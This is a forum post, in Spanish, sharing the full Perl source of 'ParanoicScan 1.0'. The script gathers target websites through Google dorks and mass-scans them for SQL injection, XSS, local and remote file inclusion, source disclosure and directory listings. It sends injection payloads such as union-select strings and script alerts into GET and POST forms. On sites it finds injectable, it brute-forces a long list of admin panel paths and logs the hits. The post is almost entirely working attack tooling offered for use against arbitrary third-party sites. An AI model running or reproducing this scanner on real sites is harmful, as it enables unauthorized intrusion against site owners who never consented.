[Perl] ParanoicScan 1.0

[BigBear]

Lo mismo que la anterior version solo se le agrego
un buscado de paneladmin y una nueva opcion para buscar listado de directorios en las paginas que estamos escaneando

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#Paranoic Scan 1.0 Updated
#(c)0ded by Doddy H 2011
#
#Search in google with a dork
#Scan type :
#
#XSS
#Full Source Discloure
#LFI
#RFI
#SQL GET & POST + admin
#Directory listing
#MSSQL
#Oracle
#Jet Database
#Find HTTP Options y Server nAME
#
#

use LWP::UserAgent;
use HTML::LinkExtor;
use HTML::Form;
use URI::Split qw(uri_split);
use IO::Socket;


my @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

installer();

sta();

sub sta {
sub head {
system 'cls';
print qq(


@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
@  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
@  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
@@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
@    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
@    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @




);
}
&menu;
sub menu {
&head;
print "[a] : Scan a File\n";
print "[b] : Search in google and scan the webs\n\n";
print "[option] : ";
chomp(my $op = <STDIN>);
if ($op =~/a/ig) {
print "\n[+] Wordlist : ";
chomp(my $word = <STDIN>);
my @paginas = repes(cortar(savewords($word)));
my $option = &men;
print "\n\n[+] Opening File\n";
scan($option,@paginas);
}
elsif ($op=~/b/ig) {
print "\n[+] Dork : ";
chomp(my $dork = <STDIN>);
print "[+] Pages : ";
chomp(my $pag = <STDIN>);
my $option = &men;
print "\n\n[+] Searching in google\n";
my @paginas = &google($dork,$pag);
scan($option,@paginas);
}
else {
&menu;
}
}
sub scan {
my ($option,@webs) = @_;
print "\n\n[Status] : Scanning\n";
print "[Webs Count] : ".int(@webs)."\n\n";
for(@webs) {
if ($option=~/S/ig) {
scansql($_);
}
if ($option=~/K/ig) {
sql($_);
}
if ($option=~/Q/ig) {
sqladmin($_);
}
if ($option=~/Y/ig) {
simple($_);
}
if ($option=~/L/ig) {
lfi($_);
}
if ($option=~/R/ig) {
rfi($_);
}
if ($option=~/F/ig) {
fsd($_);
}
if ($option=~/X/ig) {
scanxss($_);
}
if ($option=~/M/ig) {
mssql($_);
}
if ($option=~/J/ig) {
access($_);
}
if ($option=~/O/ig) {
oracle($_);
}
if ($option=~/HT/ig) {
http($_);
}
if ($option=~/A/ig) {
scansql($_);
scanxss($_);
mssql($_);
access($_);
oracle($_);
lfi($_);
rfi($_);
fsd($_);
http($_);
}
}
}
print "\n\n[Status] : Finish\n";
&finish;
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomaz {
return $nave->get($_[0]);
}

sub savefile {
open(SAVE,">>logs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}

sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
sta();
}

sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}

for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

my @founds = repes(cortar(@founds));
return @founds;
}

sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
savefile("sql-logs.txt",$page);
}}

sub sqladmin {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "\n[+] SQLI : $page\a\n";
savefile("sql-logs.txt",$page);

my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);

my $fage = "http://".$auth;

for $path(@panels) {
$code = tomaz($fage."/".$path);
if ($code->is_success) {
print "[+] Link : ".$fage."/".$path."\n";
savefile("admin-logs.txt",$fage."/".$path);
}}}}

sub http {

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);

my $socket = IO::Socket::INET->new(
PeerAddr=>$auth,
PeerPort=>"80",
Proto=>"tcp");

print $socket "OPTIONS  / HTTP/1.0\r\n\r\n";
read $socket,$resultado,"1000";

if ($resultado=~/Server:(.*)/g) {
my $server = $1;

savefile("http-logs.txt","[+] Page : $auth"."\n");
savefile("http-logs.txt","[+] Server : ".$server."\n");
}
if ($resultado=~/Allow: (.*)/g) {
my $options = $1;
savefile("http-logs.txt","[+] Options : ".$options."\n");
}
$socket->close;
}

sub scanxss {

my $page = shift;
chomp $page;

my @testar = HTML::Form->parse(toma($page),"/");
my @botones_names;
my @botones_values;
my @orden;
my @pa = ("<script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>",'"><script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>');
my @get_founds;
my @post_founds;
my @ordenuno;
my @ordendos;

my $contador_forms = 0;

my $valor = "doddyhackman";

for my $test(@testar) {
$contador_forms++;
if ($test->method eq "POST") {
my @inputs = $test->inputs;
for my $in(@inputs) {
if ($in->type eq "submit") {
if ($in->name eq "") {
push(@botones_names,"submit");
}
push(@botones_names,$in->name);
push(@botones_values,$in->value);
} else {
push(@ordenuno,$in->name,$pa[0]);
push(@ordendos,$in->name,$pa[1]);
}}

for my $n(0..int(@botones_names)-1) {
my @preuno = @ordenuno;
my @predos = @ordendos;
push(@preuno,$botones_names[$n],$botones_values[$n]);
push(@predos,$botones_names[$n],$botones_values[$n]);

my $codeuno = $nave->post($page,\@preuno)->content;
my $codedos = $nave->post($page,\@predos)->content;
if ($codeuno=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig or
$codedos=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig) {
if ($test->attr(name) eq "" or $test->attr(name) eq " ") {
push(@post_founds,$contador_forms);
} else {
push(@post_founds,$test->attr(name));
}}}
} else { #Fin de metodo POST
my @inputs = $test->inputs;
for my $in(@inputs) {
if ($in->type eq "submit") {
if ($in->name eq "") {
push(@botones_names,"submit");
}
push(@botones_names,$in->name);
push(@botones_values,$in->value);
} else {
$orden.=''.$in->name.'='.$valor.'&';
}}
chop($orden);
for my $n(0..int(@botones_names)-1) {
my $partedos = "&".$botones_names[$n]."=".$botones_values[$n];
my $final = $orden.$partedos;
for my $strin(@pa) {
chomp $strin;
$final=~s/doddyhackman/$strin/;
$code = toma($page."?".$final);
my $strin = "\Q$strin\E";
if ($code=~/$strin/) {
push(@get_founds,$page."?".$final);
}}}}}

my @get_founds = repes(@get_founds);
if (int(@get_founds) ne 0) {
for(@get_founds) {
savefile("xss-logs.txt","[+] XSS Found : $_");
print "[+] XSS Found : $_\n\a";
}}

my @post_founds = repes(@post_founds);
if (int(@post_founds) ne 0) {
for my $t(@post_founds) {
if ($t =~/^\d+$/) {
savefile("xss-logs.txt","[+] XSS : Form $t in $page");
print "[+] XSS : Form $t in $page\n\a";
}}}}


sub simple {

my $code  = toma($_[0]);
my @links = get_links($code);

for my $com (@links) {
my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
if ( $path =~ /\/(.*)$/ ) {
my $path1 = $1;
$_[0] =~ s/$path1//ig;
my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
if ( $path =~ /(.*)\// ) {
my $parche = $1;                                 
unless($repetidos=~/$parche/){
$repetidos.=" ".$parche;
my $code=toma("http://".$auth.$parche);     
if ($code =~ /Index of (.*)</ig ) {
my $dir_found = $1;
chomp $dir_found;
print "[+] Directory Found : "."http://".$auth.$parche."\n";
savefile("dir-logs.txt","[+] Directory Found : "."http://".$auth.$parche);
}}}}}}

sub scansql {

my $page = shift;
my $copia = $page;

$co = toma($page."'");

if ($co=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $co=~ /mysql_free_result/ig || $co =~ /mysql_fetch_assoc/ig ||$co =~ /mysql_num_rows/ig || $co =~ /mysql_fetch_array/ig || $co =~/mysql_fetch_assoc/ig || $co=~/mysql_query/ig || $co=~/mysql_free_result/ig || $co=~/equivocado en su sintax/ig || $co=~/You have an error in your SQL syntax/ig || $co=~/Call to undefined function/ig) {
savefile("sql-logs.txt","[+] SQL : $page");
print "[+] SQLI : $page\a\n";
} else {

if ($page=~/(.*)\?(.*)/) {
my $page = $1;

my @testar = HTML::Form->parse(toma($page),"/");
my @botones_names;
my @botones_values;
my @orden;
my @get_founds;
my @post_founds;
my @ordenuno;
my @ordendos;

my $contador_forms = 0;

my $valor = "doddyhackman";

for my $test(@testar) {
$contador_forms++;
if ($test->method eq "POST") {
my @inputs = $test->inputs;
for my $in(@inputs) {
if ($in->type eq "submit") {
if ($in->name eq "") {
push(@botones_names,"submit");
}
push(@botones_names,$in->name);
push(@botones_values,$in->value);
} else {
push(@ordenuno,$in->name,"'");
}}

for my $n(0..int(@botones_names)-1) {
my @preuno = @ordenuno;
push(@preuno,$botones_names[$n],$botones_values[$n]);
my $code = $nave->post($page,\@preuno)->content;
if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
if ($test->attr(name) eq "" or $test->attr(name) eq " ") {
push(@post_founds,$contador_forms);
} else {
push(@post_founds,$test->attr(name));
}}}}

my @post_founds = repes(@post_founds);
if (int(@post_founds) ne 0) {
for my $t(@post_founds) {
if ($t =~/^\d+$/) {
savefile("sql-logs.txt","[+] SQLI : Form $t in $page");
print "[+] SQLI : Form $t in $page\n\a";
}}}}}}}

sub access {

my $page = shift;
$code1 = toma($page."'");
if ($code1=~/Microsoft JET Database/ig or $code1=~/ODBC Microsoft Access Driver/ig) {
print "[+] Jet DB : $page\a\n";
savefile("jetdb-logs.txt",$page);
}
}

sub mssql {

my $page = shift;
$code1 = toma($page."'");
if ($code1=~/ODBC SQL Server Driver/ig) {
print "[+] MSSQL : $page\a\n";
savefile("mssql-logs.txt",$page);
}
}

sub oracle {

my $page = shift;
$code1 = toma($page."'");
if ($code1=~/Microsoft OLE DB Provider for Oracle/ig) {
print "[+] Oracle : $page\a\n";
savefile("oracle-logs.txt",$page);
}
}

sub rfi {
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
print "[+] RFI : $page\a\n";
savefile("rfi-logs.txt",$page);
}}

sub lfi {
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print "[+] LFI : $page\a\n";
savefile("lfi-logs.txt",$page);
}}

sub fsd {
my $page = shift;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) {
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
print "[+] Full Source Discloure : $page\a\n";
savefile("fpd-logs.txt",$page);
}}}

sub repes {
my @limpio;
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}

sub savewords {
open(FILE,$_[0]);
@words = <FILE>;
close FILE;
for(@words) {
push(@r,$_);
}
return(@r);
}

sub men {
print "\n\n[+] Scan Type : \n\n";
print "[X] : XSS\n";
print "[S] : SQL GET/POST\n";#
print "[K] : SQL GET\n";
print "[Q] : SQL GET + Admin\n";
print "[Y] : Directory listing\n";#
print "[M] : MSSQL\n";
print "[J] : Jet Database\n";
print "[O] : Oracle\n";
print "[L] : LFI\n";
print "[R] : RFI\n";
print "[F] : Full Source Discloure\n";
print "[HT] : HTTP Information\n";
print "[A] : All\n\n";
print "\n[Options] : ";
chomp(my $option = <STDIN>);
return $option;
}

sub cortar {
my @nuevo;
for(@_) {
if ($_ =~/=/) {
@tengo = split("=",$_);
push(@nuevo,@tengo[0]."=");
} else {
push(@nuevo,$_);
}}
return @nuevo;
}

sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;

sub agarrar {
my ($a,%b) = @_;
push(@links,values %b);
}
}


sub installer {
unless (-d "logs/") {
mkdir("logs/","777");
}
}

# ¿ The End ?